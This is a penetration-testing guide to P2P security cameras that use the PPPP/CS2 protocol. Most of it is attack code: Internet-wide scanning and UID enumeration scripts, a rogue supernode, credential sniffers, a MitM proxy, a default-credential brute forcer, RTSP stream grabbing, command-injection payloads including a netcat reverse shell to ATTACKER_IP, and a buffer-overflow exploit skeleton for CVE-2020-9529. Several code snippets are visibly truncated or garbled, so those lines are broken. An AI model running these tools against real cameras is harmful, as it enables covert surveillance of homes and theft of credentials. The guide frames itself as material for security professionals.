# PPPP (CS2) P2P Cameras - Port 32100 UDP {% tabs %} {% tab title="Support VeryLazyTech 🎉" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚 {% endtab %} {% endtabs %} ## Basic Info Peer-to-peer (P2P) enabled cameras represent one of the most significant security risks in the IoT ecosystem today. With over 50 million devices utilizing vulnerable P2P protocols like CS2 Network P2P and Shenzhen Yunni iLnkP2P, these cameras have become prime targets for attackers worldwide. This comprehensive guide provides security professionals with the complete methodology for identifying, analyzing, and testing P2P camera security. #### The P2P Camera Problem **What Makes P2P Cameras So Dangerous?** 1. **Automatic Internet Exposure**: P2P cameras bypass NAT/firewalls automatically, making them accessible from anywhere 2. **No User Configuration Required**: The "plug and play" nature means users have no visibility into security settings 3. **Massive Scale**: Over 8.7 million vulnerable devices identified on the Internet as of 2022 4. **Weak Authentication**: Default credentials, predictable UIDs, and poor password policies 5. **Built-in Backdoors**: Some implementations include intentional backdoors for "cloud access" 6. **Supply Chain Issues**: Hundreds of brands use the same vulnerable firmware #### Affected Device Types * IP Security Cameras (indoor/outdoor) * Baby Monitors * Doorbell Cameras * Digital Video Recorders (DVRs) * Network Video Recorders (NVRs) * Smart Home Alarm Systems * Nanny Cams * Pet Cameras #### Common Brands & Vendors Over 300 brands use vulnerable P2P implementations, including: * VStarcam * HiChip/Hichip Vision * ICSee * CamHi * LookCam * O-KAM Pro * Wireless IP Camera (P2P) WIFICAM * Yi Technology cameras * And hundreds more white-label products *** ### Understanding P2P Camera Architecture \\ #### How P2P Cameras Work Traditional IP cameras require manual port forwarding and DDNS configuration. P2P cameras eliminate this through a relay system: ``` [Client App] <--> [P2P Server] <--> [Camera Device] | | +---------- Direct P2P Connection ----+ (after NAT traversal) ``` **The P2P Connection Flow:** 1. **Device Registration** * Camera boots up and connects to hardcoded P2P servers * Sends registration with unique UID (e.g., "ABC-123456-VWXYZ") * Reports its public IP address and port mapping * Maintains persistent connection via keep-alive packets 2. **Client Discovery** * Mobile app or PC client connects to P2P servers * Queries for device using UID * Receives device's public IP and port information 3. **NAT Traversal (UDP Hole Punching)** * Client and device send simultaneous UDP packets to each other * Both NAT routers create temporary mappings * Direct peer-to-peer connection established 4. **Fallback Relay Mode** * If direct connection fails, traffic relays through P2P servers * Camera becomes a "supernode" that can relay other users' traffic * **Critical**: Users unknowingly proxy strangers' video streams #### Device UID Structure UIDs follow a predictable format that enables enumeration: ``` Format: [PREFIX]-[SERIAL]-[VERIFICATION] Example: VXX-1234567-ABCDE Components: - PREFIX (3 chars): Vendor identifier (e.g., VXX, ABC, YHT) - SERIAL (6-7 digits): Sequential device number - VERIFICATION (4-5 chars): Checksum/verification code ``` **Vulnerability**: The verification code uses only 22 letters (excluding A, I, O, Q), resulting in approximately 5 million possible combinations - easily brute-forceable. #### Network Ports Used | Port | Protocol | Purpose | | ----------- | -------- | ---------------------------------------------- | | **32100** | UDP | Primary P2P communication, device registration | | 32108 | UDP | Alternative P2P port, "hello" messages | | 32101-32110 | UDP | Additional P2P relay ports | | 443 | TCP | Obfuscated traffic (not real HTTPS) | | 80 | TCP | HTTP web interface on camera | | 554 | TCP | RTSP video streaming | | 8000-8001 | TCP | Alternative HTTP ports | #### Hardcoded P2P Servers Analysis reveals cameras connect to specific server IPs/domains: **Common CS2 Network Servers:** ``` 121.42.208.86:32100 (Hangzhou, China - Alibaba) 54.221.213.97:32100 (Amazon AWS US) 120.24.37.48:32100 (Hangzhou, China - Alibaba) 52.74.75.23:32100 (Amazon AWS Singapore) ``` **Common iLnkP2P Servers:** ``` 121.40.184.33:32100 (Hangzhou, China) 120.25.151.105:32100 (Hangzhou, China) 120.25.157.75:32100 (Hangzhou, China) ``` *** ## The PPPP/CS2 Protocol Explained #### Protocol Overview PPPP (Peer-to-Peer Proprietary Protocol) is a UDP-based protocol developed by CS2 Network. Despite the name, it attempts to replicate TCP functionality over UDP with custom reliability mechanisms. #### Message Structure **Basic PPPP Message Format:** ``` Offset Size Field Description ------ ---- ----- ----------- 0x00 1 Magic Always 0xF1 0x01 1 Version Protocol version (typically 0x00) 0x02 2 Total Length Total packet length (little-endian) 0x04 4 Message Type Command identifier 0x08 4 Session ID Session identifier 0x0C 4 Sequence Packet sequence number 0x10 N Payload Message-specific data ``` **Example "Hello" Message (First packet sent to port 32100):** ``` Hex: F1 00 00 00 Binary: 11110001 00000000 00000000 00000000 This is the plaintext magic number that identifies PPPP traffic ``` #### Message Types Common message types identified through reverse engineering: ```c #define MSG_HELLO 0x00 // Initial connection #define MSG_PUNCH_TO 0x01 // NAT hole punching #define MSG_P2P_RDY 0x02 // P2P ready #define MSG_PUNCH_PKT 0x03 // Punch packet #define MSG_LAN_SEARCH 0x04 // Local network search #define MSG_DEVICE_INFO 0x05 // Device information #define MSG_DEV_LGN 0x10 // Device login (plaintext) #define MSG_DEV_LGN_CRC 0x11 // Device login (encrypted) #define MSG_REPORT_SESSION_READY 0x15 // Session established #define MSG_ALIVE 0x40 // Keep-alive #define MSG_ALIVE_ACK 0x41 // Keep-alive response #define MSG_DRW 0x60 // Data relay wrapper ``` #### "Encryption" & Obfuscation The protocol uses weak obfuscation, not real encryption: **P2P\_Proprietary\_Encrypt Function** ```python def p2p_proprietary_encrypt(data, key): """ CS2 Network's proprietary 'encryption' Key is typically visible in app code """ # Mash 16-byte key into 4 bytes mashed_key = ( key[0] + key[1] + key[2] + key[3] + key[4] + key[5] + key[6] + key[7] + key[8] + key[9] + key[10] + key[11] + key[12] + key[13] + key[14] + key[15] ) & 0xFFFFFFFF # XOR each byte with rotated key encrypted = bytearray() for i, byte in enumerate(data): key_byte = (mashed_key >> ((i % 4) * 8)) & 0xFF encrypted.append(byte ^ key_byte) return bytes(encrypted) ``` **Common Hardcoded Keys:** ``` BBAA - Most common default key 7E59E6C1BF37C10AB6A4E873AFB9EA68 - Common init string key FFFF - Alternative key 0000 - Another common key ``` **Critical Weakness**: Keys are stored plaintext in mobile apps and can be extracted via APK decompilation. **PPPP\_CRCEnc Function (Additional Layer)** ```python def pppp_crc_enc(data, key): """ Additional obfuscation for sensitive messages """ # Mash key to 4 bytes mashed = (key[0] << 24) | (key[1] << 16) | (key[2] << 8) | key[3] # Extend data with 'CCCC' marker extended = data + b'CCCC' # Generate byte sequence from key sequence = [] for i in range(len(extended)): sequence.append((mashed >> ((i % 4) * 8)) & 0xFF) # XOR with sequence result = bytearray() for i in range(len(extended)): result.append(extended[i] ^ sequence[i]) return bytes(result) ``` #### Protocol Vulnerabilities 1. **Weak Obfuscation**: XOR-based "encryption" easily reversible 2. **Known Plaintext**: First packet always starts with F1 00 00 00 3. **Hardcoded Keys**: Keys embedded in application binaries 4. **No Perfect Forward Secrecy**: Same key used for entire session 5. **Replay Attacks**: No nonce or timestamp validation 6. **Man-in-the-Middle**: No certificate validation on "HTTPS" fallback *** ## Reconnaissance & Discovery #### 1. Network Scanning **Discovering P2P Cameras on Local Network** ```bash # Nmap scan for common P2P ports nmap -sU -p 32100,32108 192.168.1.0/24 # Service detection sudo nmap -sU -sV -p 32100,32108 --version-intensity 9 192.168.1.0/24 # Script scan nmap -sU -p 32100 --script broadcast-pppp-discover 192.168.1.0/24 ``` **UDP Port 32100 Detection** ```bash # Send PPPP hello packet echo -ne '\xf1\x00\x00\x00' | nc -u -w1 192.168.1.100 32100 # Using hping3 hping3 --udp -p 32100 -d 4 -E hello.bin 192.168.1.100 ``` **Expected Response Pattern:** ``` Devices will respond with PPPP protocol messages Length typically 20-100 bytes Contains device information ``` #### 2. LAN Search Protocol P2P cameras support local network discovery via broadcast: **LAN Search Message Structure:** ```python #!/usr/bin/env python3 import socket import struct def lan_search(): """ Broadcast LAN search to discover P2P cameras """ # Create broadcast socket sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1) sock.settimeout(5) # LAN search message # Magic: 0x2CBA5F5D message = struct.pack('= 24: # Typical response contains UID and device info print(f" Device info: {data[:24].hex()}") devices.append({ 'ip': addr[0], 'port': addr[1], 'data': data.hex() }) except socket.timeout: print(f"[*] Search complete. Found {len(devices)} devices") return devices if __name__ == "__main__": devices = lan_search() ``` #### 3. Internet-Wide Discovery **Using Shodan** ```bash # Search for P2P cameras shodan search "port:32100" # More specific queries shodan search "port:32100 country:US" shodan search "P2P camera" shodan search "VStarcam" shodan search "HiChip" # Download results shodan download p2p_cameras "port:32100" --limit 10000 shodan parse --fields ip_str,port,org p2p_cameras.json.gz ``` **Using Censys** ```python from censys.search import CensysHosts def search_p2p_cameras(): """ Search for P2P cameras using Censys API """ h = CensysHosts() query = "services.port:32100" for page in h.search(query, per_page=100, pages=5): for host in page: print(f"[+] Found: {host['ip']}") # Check for P2P service for service in host.get('services', []): if service.get('port') == 32100: print(f" Service: {service.get('service_name')}") print(f" Banner: {service.get('banner', 'N/A')[:100]}") search_p2p_cameras() ``` **Using Masscan** ```bash # Fast Internet scan for port 32100 sudo masscan -p U:32100 0.0.0.0/0 --rate 10000 --output-format list \ --output-filename p2p_scan.txt # Target specific ranges sudo masscan -p U:32100 1.0.0.0/8 --rate 100000 -oL results.txt ``` #### 4. Identifying P2P Servers **Passive Monitoring:** ```bash # Capture traffic from a known P2P camera tcpdump -i eth0 -w p2p_traffic.pcap 'udp port 32100 or udp port 32108' # Filter and analyze tshark -r p2p_traffic.pcap -Y "udp.port == 32100" \ -T fields -e ip.dst -e udp.dstport | sort -u # Extract server IPs tshark -r p2p_traffic.pcap -Y "udp.port == 32100 && ip.dst != 192.168.0.0/16" \ -T fields -e ip.dst | sort -u ``` **Expected P2P Server Indicators:** ``` - IP addresses in China (Alibaba Cloud) - IP addresses on Amazon AWS - Ports 32100, 32101-32110 - High packet frequency (keep-alive every 30-60 seconds) ``` #### 5. Device Fingerprinting ```python #!/usr/bin/env python3 import socket import time def fingerprint_pppp_device(target_ip, target_port=32100): """ Fingerprint P2P device to identify vendor/model """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(3) fingerprints = [] # Test 1: Basic HELLO message print(f"[*] Testing HELLO message...") hello = b'\xf1\x00\x00\x00' sock.sendto(hello, (target_ip, target_port)) try: response, _ = sock.recvfrom(1024) fingerprints.append({ 'test': 'HELLO', 'response_length': len(response), 'response_hex': response.hex() }) print(f" Response length: {len(response)} bytes") except socket.timeout: print(f" No response") # Test 2: LAN search message print(f"[*] Testing LAN search...") lan_search = b'\x5d\x5f\xba\x2c' sock.sendto(lan_search, (target_ip, 32108)) try: response, _ = sock.recvfrom(1024) fingerprints.append({ 'test': 'LAN_SEARCH', 'response_length': len(response), 'response_hex': response.hex() }) print(f" Response length: {len(response)} bytes") except socket.timeout: print(f" No response") # Test 3: Check for encryption print(f"[*] Testing encryption...") encrypted_test = b'\xf1\x00\x10\x00' + b'\x00' * 12 sock.sendto(encrypted_test, (target_ip, target_port)) try: response, _ = sock.recvfrom(1024) # Check if response appears encrypted if b'\xf1' not in response[:4]: print(f" Device uses encryption/obfuscation") fingerprints.append({ 'test': 'ENCRYPTION', 'encrypted': True }) else: print(f" Device uses plaintext") fingerprints.append({ 'test': 'ENCRYPTION', 'encrypted': False }) except socket.timeout: pass return fingerprints # Usage fingerprints = fingerprint_pppp_device('192.168.1.100') ``` *** ## Protocol Analysis & Reverse Engineering #### 1. Wireshark Analysis **Installing PPPP Dissector** ```bash # Clone PPPP dissector git clone https://github.com/magicus/pppp-dissector.git cd pppp-dissector # Copy to Wireshark plugins directory cp pppp.lua ~/.local/lib/wireshark/plugins/ # Or for system-wide installation sudo cp pppp.lua /usr/lib/x86_64-linux-gnu/wireshark/plugins/ ``` **Capturing P2P Traffic** ```bash # Start capture on camera network interface sudo wireshark -i eth0 -k -f "udp port 32100 or udp port 32108" # Or use tcpdump and analyze later sudo tcpdump -i eth0 -w p2p_capture.pcap \ 'udp port 32100 or udp port 32108 or udp port 443' ``` **Analyzing Captures** ``` Wireshark Filters: # Show all PPPP messages pppp # Show specific message types pppp.type == 0x00 (HELLO messages) pppp.type == 0x10 (Login messages) pppp.type == 0x40 (Keep-alive) # Show encrypted messages pppp.encrypted == 1 # Follow PPPP stream Right-click packet → Follow → UDP Stream ``` #### 2. Decrypting Traffic ```python #!/usr/bin/env python3 def decrypt_pppp_message(encrypted_data, key="BBAA"): """ Decrypt PPPP encrypted message """ # Convert key to bytes if len(key) == 4: # Short key format (e.g., "BBAA") key_bytes = bytes.fromhex(key * 8) # Extend to 16 bytes else: key_bytes = bytes.fromhex(key) # Mash key to 4 bytes (P2P_Proprietary_Decrypt logic) mashed_key = sum(key_bytes) & 0xFFFFFFFF # Decrypt decrypted = bytearray() for i, byte in enumerate(encrypted_data): key_byte = (mashed_key >> ((i % 4) * 8)) & 0xFF decrypted.append(byte ^ key_byte) return bytes(decrypted) # Test with captured data encrypted_hex = "f1004500..." # From Wireshark encrypted_data = bytes.fromhex(encrypted_hex) # Try common keys common_keys = ["BBAA", "FFFF", "0000", "7E59E6C1BF37C10AB6A4E873AFB9EA68"] for key in common_keys: try: decrypted = decrypt_pppp_message(encrypted_data[4:], key) print(f"Key: {key}") print(f"Decrypted: {decrypted.hex()}") print(f"ASCII: {decrypted.decode('utf-8', errors='ignore')}\n") except Exception as e: continue ``` #### 3. Reverse Engineering Mobile Apps **Extracting APK** ```bash # Pull APK from device adb shell pm list packages | grep -i camera adb shell pm path com.example.camera adb pull /data/app/com.example.camera-xxx/base.apk # Or download from APKPure/APKMirror wget https://apkpure.com/...camera.apk ``` **Decompiling with JADX** ```bash # Install JADX sudo apt install jadx # Decompile APK jadx -d output/ camera.apk # Search for interesting strings cd output grep -r "32100" . grep -r "PPPP" . grep -r "init_string" . grep -r "encryption" . ``` **Finding Encryption Keys** ```bash # Common locations in decompiled code grep -r "BBAA" . grep -r "encrypt" . | grep -i key grep -r "decrypt" . | grep -i key # Check native libraries cd lib/ strings libPPPP_API.so | grep -E "[A-F0-9]{32}" strings libPPPP_API.so | grep -i "init" ``` **Extracting Init Strings** Init strings contain server addresses and encryption keys: ```python #!/usr/bin/env python3 def decode_pppp_init_string(encoded): """ Decode PPPP init string (CS2 Network obfuscation) """ # CS2's PPPP_DecodeString function uses lookup table lookup = [ 0x7D, 0x19, 0x5B, 0x2D, 0x4E, 0x71, 0x3A, 0x0F, # ... (full lookup table from reverse engineering) ] decoded = [] for char in encoded: # Apply reverse transformation idx = ord(char) ^ 0x5A decoded.append(lookup[idx % len(lookup)]) return ''.join(chr(c) for c in decoded) # Example encoded init string from app encoded = "gH8K3lM..." # From app resources decoded = decode_pppp_init_string(encoded) print(f"Decoded: {decoded}") # Expected format: "server1,server2,server3:key" ``` #### 4. Firmware Analysis **Extracting Firmware** ```bash # If firmware update available wget http://firmware.vendor.com/camera_v2.bin # Extract with binwalk binwalk -e camera_v2.bin # Or manually extract dd if=camera_v2.bin of=rootfs.bin bs=1 skip=OFFSET count=SIZE ``` **Analyzing Filesystem** ```bash # Mount extracted filesystem cd _camera_v2.bin.extracted/squashfs-root/ # Find PPPP-related files find . -name "*pppp*" -o -name "*p2p*" # Check startup scripts cat etc/init.d/S* # Find hardcoded credentials grep -r "admin" etc/ grep -r "password" etc/ grep -r "12345" etc/ # Check for backdoors grep -r "telnet" etc/ grep -r "busybox" bin/ ``` **Finding PPPP Configuration** ```bash # Common config locations cat etc/pppp.conf cat etc/p2p.conf cat usr/share/p2p_config # Extract from binaries strings bin/camera_daemon | grep -E "([0-9]{1,3}\.){3}[0-9]{1,3}" strings lib/libPPPP.so | grep "32100" ``` *** ## Enumeration Techniques #### 1. UID Enumeration UIDs are predictable, allowing mass enumeration: ```python #!/usr/bin/env python3 import itertools import socket def generate_uids(prefix, start=0, count=10000): """ Generate predictable UIDs for a vendor prefix """ # Verification code uses 22 letters (no A, I, O, Q) valid_chars = 'BCDEFGHJKLMNPRSTUVWXYZ' uids = [] for serial in range(start, start + count): # Generate verification code (simplified - real algorithm varies) # This is a placeholder - actual algorithm requires reverse engineering checksum = serial % (22 ** 5) # Convert to base-22 verification = '' temp = checksum for _ in range(5): verification = valid_chars[temp % 22] + verification temp //= 22 uid = f"{prefix}-{serial:07d}-{verification}" uids.append(uid) return uids def check_uid_online(uid, server='121.42.208.86', port=32100): """ Check if UID is online via P2P server """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(2) try: # Build device lookup message # Format varies by implementation message = build_lookup_message(uid) sock.sendto(message, (server, port)) response, _ = sock.recvfrom(1024) # Parse response if len(response) > 20: # Device found return True, extract_device_info(response) except socket.timeout: return False, None except Exception as e: return False, str(e) return False, None # Enumerate UIDs for a specific vendor prefix = "VXX" # Example VStarcam prefix uids = generate_uids(prefix, start=1000000, count=1000) found_devices = [] for uid in uids: online, info = check_uid_online(uid) if online: print(f"[+] Found online device: {uid}") print(f" Info: {info}") found_devices.append((uid, info)) ``` #### 2. Using Paul Marrapese's Tools ```bash # Clone IoT security research tools git clone https://github.com/pmarrapese/iot.git cd iot/p2p # LAN search script ./lansearch/search.sh # Expected output: # Scanning local network for P2P cameras... # Found device: 192.168.1.100 # UID: VXX-1234567-ABCDE # Model: IP Camera # Firmware: 10.1.110.2 ``` #### 3. Rogue Supernode Attack Attackers can register as a "supernode" to collect device UIDs: ```python #!/usr/bin/env python3 import socket import struct import threading class RogueSupernode: def __init__(self, listen_port=32100): self.listen_port = listen_port self.discovered_devices = [] self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.bind(('0.0.0.0', listen_port)) def handle_message(self, data, addr): """ Handle incoming P2P messages """ if len(data) < 4: return # Check for PPPP magic if data[0] == 0xF1: msg_type = struct.unpack('= 8 else 0 # Device registration message if msg_type == 0x10: # MSG_DEV_LGN uid = self.extract_uid(data) if uid: print(f"[+] Device registered: {uid}") print(f" IP: {addr[0]}:{addr[1]}") self.discovered_devices.append({ 'uid': uid, 'ip': addr[0], 'port': addr[1], 'raw_data': data.hex() }) # Send fake response to keep device connected response = self.build_registration_response(uid) self.sock.sendto(response, addr) def extract_uid(self, data): """ Extract UID from device registration message """ # UID typically at offset 0x20-0x40 # Format: PREFIX-XXXXXXX-VVVVV try: # This varies by implementation uid_bytes = data[32:64] uid = uid_bytes.decode('utf-8', errors='ignore').strip('\x00') if '-' in uid: return uid except: pass return None def build_registration_response(self, uid): """ Build fake server response """ # Construct response message response = bytearray() response.extend(b'\xF1\x00\x20\x00') # PPPP header response.extend(struct.pack(' 4 and payload[0] == 0xF1: print(f"\n[+] PPPP Packet from {packet[IP].src}:{packet[UDP].sport}") print(f" To: {packet[IP].dst}:{packet[UDP].dport}") print(f" Length: {len(payload)} bytes") print(f" Hex: {payload[:64].hex()}") # Try to extract UID if b'-' in payload: potential_uid = payload[payload.find(b'-')-3:payload.find(b'-')+20] print(f" Potential UID: {potential_uid.decode('utf-8', errors='ignore')}") # Check for credentials if b'admin' in payload or b'password' in payload: print(f" [!] Potential credentials in packet!") print(f" {payload.decode('utf-8', errors='ignore')}") # Sniff P2P traffic print("[*] Sniffing P2P traffic...") sniff(filter="udp port 32100 or udp port 32108", prn=analyze_pppp_packet, store=0) ``` *** ## Authentication & Credential Attacks #### 1. Default Credentials Common default credentials for P2P cameras: ```python #!/usr/bin/env python3 # Default credentials database DEFAULT_CREDS = [ ('admin', ''), ('admin', 'admin'), ('admin', '12345'), ('admin', '123456'), ('admin', '888888'), ('admin', '666666'), ('root', 'root'), ('root', 'admin'), ('root', '12345'), ('user', 'user'), ('guest', 'guest'), ('', ''), # No authentication ] def test_authentication(target_ip, username, password): """ Test authentication against P2P camera This varies by vendor - example for HTTP interface """ import requests # Try HTTP login try: response = requests.get( f'http://{target_ip}/login.cgi', params={'user': username, 'password': password}, timeout=5 ) if response.status_code == 200 and 'success' in response.text.lower(): return True except: pass # Try PPPP login # (Implementation varies by vendor) return False def brute_force_camera(target_ip): """ Brute force P2P camera authentication """ print(f"[*] Testing default credentials on {target_ip}") for username, password in DEFAULT_CREDS: print(f" [-] Trying {username}:{password}") if test_authentication(target_ip, username, password): print(f" [+] SUCCESS! {username}:{password}") return (username, password) print(f" [-] No default credentials worked") return None ``` #### 2. Credential Interception P2P protocols often transmit credentials in plaintext or weak obfuscation: ```python #!/usr/bin/env python3 from scapy.all import * import re def extract_credentials(packet): """ Extract credentials from P2P traffic """ if UDP in packet: payload = bytes(packet[UDP].payload) # Look for common patterns patterns = [ rb'user=([^&\x00]+)', rb'username=([^&\x00]+)', rb'loginuse=([^&\x00]+)', rb'pwd=([^&\x00]+)', rb'password=([^&\x00]+)', rb'loginpas=([^&\x00]+)', ] credentials = {} for pattern in patterns: match = re.search(pattern, payload) if match: key = pattern.decode().split('=')[0].replace('(', '') value = match.group(1).decode('utf-8', errors='ignore') credentials[key] = value if credentials: print(f"\n[!] Credentials intercepted!") print(f" Source: {packet[IP].src}") print(f" Credentials: {credentials}") # Sniff for credentials sniff(filter="udp port 32100", prn=extract_credentials, store=0) ``` #### 3. Man-in-the-Middle Attack ```python #!/usr/bin/env python3 import socket import threading class PPPPMitM: def __init__(self, real_server='121.42.208.86', real_port=32100): self.real_server = real_server self.real_port = real_port self.listen_port = 32100 self.captured_data = [] def proxy_client_to_server(self, client_sock, client_addr): """ Proxy messages between client and server """ server_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) while True: try: # Receive from client data, _ = client_sock.recvfrom(4096) print(f"\n[C→S] Client {client_addr} → Server") print(f" Length: {len(data)} bytes") print(f" Hex: {data[:64].hex()}") # Log credentials if b'admin' in data or b'password' in data: print(f" [!] Potential credentials!") self.captured_data.append({ 'direction': 'client_to_server', 'data': data, 'client': client_addr }) # Forward to real server server_sock.sendto(data, (self.real_server, self.real_port)) # Wait for response server_sock.settimeout(2) response, _ = server_sock.recvfrom(4096) print(f"\n[S→C] Server → Client {client_addr}") print(f" Length: {len(response)} bytes") # Forward response to client client_sock.sendto(response, client_addr) except socket.timeout: continue except Exception as e: break def start(self): """ Start MitM proxy """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.bind(('0.0.0.0', self.listen_port)) print(f"[*] Starting PPPP MitM proxy on port {self.listen_port}") print(f"[*] Forwarding to {self.real_server}:{self.real_port}") # Note: For UDP, we track client connections manually clients = {} while True: data, addr = sock.recvfrom(4096) if addr not in clients: print(f"[+] New client: {addr}") clients[addr] = True # Handle in thread threading.Thread( target=self.proxy_client_to_server, args=(sock, addr) ).start() # Usage (requires ARP spoofing or DNS hijacking to redirect traffic) mitm = PPPPMitM() mitm.start() ``` #### 4. Password Extraction from Firmware ```bash #!/bin/bash # Extract passwords from camera firmware FIRMWARE="camera_firmware.bin" EXTRACT_DIR="firmware_extracted" echo "[*] Extracting firmware..." binwalk -e "$FIRMWARE" -C "$EXTRACT_DIR" cd "$EXTRACT_DIR/_${FIRMWARE}.extracted/squashfs-root" echo "[*] Searching for hardcoded credentials..." # Check shadow file if [ -f etc/shadow ]; then echo "[+] Found /etc/shadow:" cat etc/shadow fi # Check passwd file if [ -f etc/passwd ]; then echo "[+] Found /etc/passwd:" cat etc/passwd fi # Search for password strings echo "[*] Searching for 'password' strings..." grep -r -i "password" . 2>/dev/null | head -20 # Search for admin strings echo "[*] Searching for 'admin' strings..." grep -r -i "admin" . 2>/dev/null | head -20 # Check config files echo "[*] Checking config files..." find . -name "*.conf" -exec grep -l "pass\|user\|admin" {} \; # Dump from binaries echo "[*] Extracting strings from binaries..." strings bin/* | grep -E "admin|password|user.*=|pwd.*=" | head -30 ``` *** ## Exploitation Techniques #### 1. Direct RTSP Stream Access Many P2P cameras expose RTSP streams without proper authentication: ```python #!/usr/bin/env python3 import cv2 def access_rtsp_stream(camera_ip, port=554, username='admin', password=''): """ Access RTSP video stream """ # Common RTSP paths rtsp_paths = [ f'rtsp://{username}:{password}@{camera_ip}:{port}/stream1', f'rtsp://{username}:{password}@{camera_ip}:{port}/live', f'rtsp://{username}:{password}@{camera_ip}:{port}/h264', f'rtsp://{username}:{password}@{camera_ip}:{port}/11', f'rtsp://{username}:{password}@{camera_ip}:{port}/ch0', f'rtsp://{username}:{password}@{camera_ip}:{port}/onvif1', ] for rtsp_url in rtsp_paths: print(f"[*] Trying: {rtsp_url}") try: cap = cv2.VideoCapture(rtsp_url) if cap.isOpened(): ret, frame = cap.read() if ret: print(f"[+] SUCCESS! Stream accessible at: {rtsp_url}") # Save frame cv2.imwrite(f'camera_{camera_ip}_frame.jpg', frame) print(f" [+] Saved frame to camera_{camera_ip}_frame.jpg") cap.release() return rtsp_url cap.release() except Exception as e: continue print(f"[-] No RTSP streams found") return None # Test stream_url = access_rtsp_stream('192.168.1.100') ``` #### 2. Command Injection Some camera web interfaces are vulnerable to command injection: ```python #!/usr/bin/env python3 import requests def test_command_injection(target_ip, port=80): """ Test for command injection vulnerabilities """ # Common injection points payloads = [ ';id', '| id', '`id`', '$(id)', ';cat /etc/passwd', '| cat /etc/passwd', ';nc ATTACKER_IP 4444 -e /bin/sh', ] # Common vulnerable parameters params = [ 'filename', 'file', 'path', 'cmd', 'command', 'exec', 'ping', 'host', ] for param in params: for payload in payloads: url = f'http://{target_ip}:{port}/cgi-bin/test.cgi' data = {param: payload} try: response = requests.post(url, data=data, timeout=5) # Check for command injection indicators if any(indicator in response.text for indicator in ['uid=', 'root:', '/bin/sh']): print(f"[+] VULNERABLE! Injection point: {param}") print(f" Payload: {payload}") print(f" Response: {response.text[:200]}") return True except: continue return False ``` #### 3. CVE-2020-9529: Hichip Buffer Overflow Critical pre-authentication RCE affecting millions of cameras: ```python #!/usr/bin/env python3 import socket import struct def exploit_cve_2020_9529(target_ip, target_port=32108, callback_ip='192.168.1.50', callback_port=4444): """ Exploit CVE-2020-9529 - Hichip buffer overflow This is a simplified proof-of-concept Real exploitation requires shellcode tailored to target architecture """ # Build exploit payload # Vulnerable function: memcpy in LAN search handler # Buffer overflow offset (varies by firmware version) offset = 512 # ARM reverse shell shellcode (example - needs to be customized) shellcode = ( b"\x01\x30\x8f\xe2" # add r3, pc, #1 b"\x13\xff\x2f\xe1" # bx r3 # ... (full shellcode here) ) # ROP chain to bypass NX (if present) rop_chain = struct.pack(' 20: # Parse response to extract device info # Format varies by implementation return True, extract_device_info(response) except socket.timeout: pass except Exception as e: pass return False, None def mass_enumerate_iLnkP2P(prefix="ABC", start=0, count=100000): """ Mass enumerate iLnkP2P devices """ print(f"[*] Enumerating {count} UIDs with prefix {prefix}") found = [] def check_range(serial_start, serial_end): local_found = [] for serial in range(serial_start, serial_end): # Generate UID (simplified - real algo needed) uid = f"{prefix}-{serial:07d}-XXXXX" exists, info = check_uid_exists(uid) if exists: print(f"[+] Found: {uid}") local_found.append((uid, info)) return local_found # Parallel enumeration with ThreadPoolExecutor(max_workers=50) as executor: chunk_size = 1000 futures = [] for i in range(0, count, chunk_size): future = executor.submit(check_range, start + i, start + i + chunk_size) futures.append(future) for future in futures: found.extend(future.result()) print(f"\n[*] Enumeration complete") print(f"[*] Found {len(found)} devices") return found # Usage devices = mass_enumerate_iLnkP2P("VXX", start=1000000, count=10000) ``` **Vendor Status**: No fix from Shenzhen Yunni (abandoned product) #### 2. CVE-2019-11220: iLnkP2P Man-in-the-Middle **Impact**: Complete traffic interception, credential theft, video stream access **Details**: * No encryption for credentials * No certificate validation * Session tokens transmitted in plaintext **Exploitation**: ```python #!/usr/bin/env python3 from scapy.all import * import re def mitm_iLnkP2P_session(): """ Intercept iLnkP2P credentials and video """ captured_creds = [] def packet_handler(packet): if UDP in packet and packet[UDP].dport == 32100: payload = bytes(packet[UDP].payload) # Check for login messages if b'loginuse=' in payload or b'loginpas=' in payload: print(f"\n[!] LOGIN CAPTURED!") print(f" From: {packet[IP].src}") print(f" To: {packet[IP].dst}") # Extract credentials username = re.search(rb'loginuse=([^&\x00]+)', payload) password = re.search(rb'loginpas=([^&\x00]+)', payload) if username and password: user = username.group(1).decode() pwd = password.group(1).decode() print(f" Username: {user}") print(f" Password: {pwd}") captured_creds.append({ 'username': user, 'password': pwd, 'source_ip': packet[IP].src, 'device_ip': packet[IP].dst }) # Check for video stream data elif len(payload) > 1000: # Likely video data print(f"[*] Video stream data intercepted ({len(payload)} bytes)") print("[*] Starting iLnkP2P MitM sniffer...") sniff(filter="udp port 32100", prn=packet_handler, store=0) # Usage (requires network position to intercept traffic) mitm_iLnkP2P_session() ``` #### 3. CVE-2020-9525/9526: CS2 Network P2P MitM **Impact**: Same as iLnkP2P - affects 50+ million devices **Details**: * Weak XOR-based obfuscation * Hardcoded encryption keys in apps * No authentication of P2P servers **Exploitation**: Similar to iLnkP2P, but requires decryption with extracted key #### 4. CVE-2020-9529: Hichip Pre-Auth RCE **Impact**: Remote code execution as root without authentication **Details**: * Buffer overflow in LAN search handler * No stack protection (ASLR/NX often disabled) * Affects 81% of iLnkP2P devices (60+ million cameras) **Exploitation**: See exploitation section above **Vendor Status**: Patched June 2020, but millions remain vulnerable #### 5. Supernode Relay Exploitation **Impact**: Traffic from millions of users relayed through compromised devices **Details**: * Devices can be promoted to "supernode" status * Supernodes relay traffic for other P2P connections * Users unaware their camera is proxying 